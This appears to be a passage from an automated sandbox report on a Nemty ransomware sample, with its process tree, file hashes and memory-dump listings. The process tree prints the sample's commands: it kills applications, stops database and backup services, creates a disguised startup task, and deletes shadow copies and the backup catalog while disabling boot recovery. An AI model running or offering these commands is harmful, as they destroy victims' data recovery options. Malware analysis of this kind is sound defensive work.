C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im onenote.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im node.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im QBW32.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im virtualboxvm.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im WBGX.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im Teams.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im Flow.*2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop DbxSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop OracleXETNSListener2⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop AcrSch2Svc2⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop OracleServiceXE2⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop AcronisAgent2⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop Apache2.42⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.44⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop SQLWriter2⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MSSQLServerADHelper1002⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop MongoDB2⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop SQLAgent$SQLEXPRESS2⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop SQLBrowser2⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop cbVSCService112⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop QBVSS2⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop QBCFMontorService2⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop CobianBackup112⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop2⤵
-
C:\Windows\SysWOW64\net.exenet stop3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /create /sc onstart /tn "NEMTY_O85YRFZ" /tr "C:\Users\Admin\AdobeUpdate.exe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /sc onstart /tn "NEMTY_O85YRFZ" /tr "C:\Users\Admin\AdobeUpdate.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txt"2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txt3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txtMD5
5a6559091bbc265f02a0a6a278097d6a
SHA1ead7e4671ada9d7d72aeba9dfc5506f83a89d715
SHA2564dbc1444d9bf7790afee764262d108077310233d44524f0c32f639dc44ed79f5
SHA512e18681f20cb798ff19e847eb3d4d2ea0ba4e3896b009d0ceb3f682eae6401d9d5bf47919fedf3628f05a77810fc17f646886533ac3c049f9bc514cf59553ef9d
-
memory/1208-119-0x0000000000000000-mapping.dmp
-
memory/1312-125-0x0000000000000000-mapping.dmp
-
memory/1336-132-0x0000000000000000-mapping.dmp
-
memory/1524-127-0x0000000000000000-mapping.dmp
-
memory/1756-121-0x0000000000000000-mapping.dmp
-
memory/1776-120-0x0000000000000000-mapping.dmp
-
memory/1828-131-0x0000000000000000-mapping.dmp
-
memory/1872-133-0x0000000000000000-mapping.dmp
-
memory/2032-117-0x0000000000000000-mapping.dmp
-
memory/2096-123-0x0000000000000000-mapping.dmp
-
memory/2596-126-0x0000000000000000-mapping.dmp
-
memory/2644-130-0x0000000000000000-mapping.dmp
-
memory/2668-122-0x0000000000000000-mapping.dmp
-
memory/2932-116-0x0000000000000000-mapping.dmp
-
memory/3680-129-0x0000000000000000-mapping.dmp
-
memory/3692-118-0x0000000000000000-mapping.dmp
-
memory/3872-128-0x0000000000000000-mapping.dmp
-
memory/3888-161-0x0000000000000000-mapping.dmp
-
memory/4012-124-0x0000000000000000-mapping.dmp
-
memory/4084-114-0x0000000000610000-0x0000000000628000-memory.dmpFilesize
96KB
-
memory/4084-115-0x0000000000400000-0x0000000000522000-memory.dmpFilesize
1.1MB
-
memory/4132-134-0x0000000000000000-mapping.dmp
-
memory/4168-135-0x0000000000000000-mapping.dmp
-
memory/4236-136-0x0000000000000000-mapping.dmp
-
memory/4276-137-0x0000000000000000-mapping.dmp
-
memory/4304-162-0x0000000000000000-mapping.dmp
-
memory/4312-138-0x0000000000000000-mapping.dmp
-
memory/4352-139-0x0000000000000000-mapping.dmp
-
memory/4384-163-0x0000000000000000-mapping.dmp
-
memory/4388-140-0x0000000000000000-mapping.dmp
-
memory/4432-141-0x0000000000000000-mapping.dmp
-
memory/4476-142-0x0000000000000000-mapping.dmp
-
memory/4520-143-0x0000000000000000-mapping.dmp
-
memory/4588-144-0x0000000000000000-mapping.dmp
-
memory/4632-145-0x0000000000000000-mapping.dmp
-
memory/4684-146-0x0000000000000000-mapping.dmp
-
memory/4696-147-0x0000000000000000-mapping.dmp
-
memory/4728-148-0x0000000000000000-mapping.dmp
-
memory/4768-149-0x0000000000000000-mapping.dmp
-
memory/4780-150-0x0000000000000000-mapping.dmp
-
memory/4792-151-0x0000000000000000-mapping.dmp
-
memory/4824-164-0x0000000000000000-mapping.dmp
-
memory/4828-152-0x0000000000000000-mapping.dmp
-
memory/4840-153-0x0000000000000000-mapping.dmp
-
memory/4876-154-0x0000000000000000-mapping.dmp
-
memory/4884-165-0x0000000000000000-mapping.dmp
-
memory/4916-155-0x0000000000000000-mapping.dmp
-
memory/4948-156-0x0000000000000000-mapping.dmp
-
memory/4992-157-0x0000000000000000-mapping.dmp
-
memory/5000-158-0x0000000000000000-mapping.dmp
-
memory/5064-159-0x0000000000000000-mapping.dmp
-
memory/5072-166-0x0000000000000000-mapping.dmp
-
memory/5092-160-0x0000000000000000-mapping.dmp
-
memory/5144-167-0x0000000000000000-mapping.dmp
-
memory/5160-168-0x0000000000000000-mapping.dmp
-
memory/5184-169-0x0000000000000000-mapping.dmp
-
memory/5200-170-0x0000000000000000-mapping.dmp
-
memory/5220-172-0x0000000000000000-mapping.dmp
-
memory/5228-171-0x0000000000000000-mapping.dmp
-
memory/5248-173-0x0000000000000000-mapping.dmp
-
memory/5280-174-0x0000000000000000-mapping.dmp
-
memory/5300-175-0x0000000000000000-mapping.dmp
-
memory/5328-176-0x0000000000000000-mapping.dmp
-
memory/5372-177-0x0000000000000000-mapping.dmp
-
memory/5392-178-0x0000000000000000-mapping.dmp
-
memory/5416-179-0x0000000000000000-mapping.dmp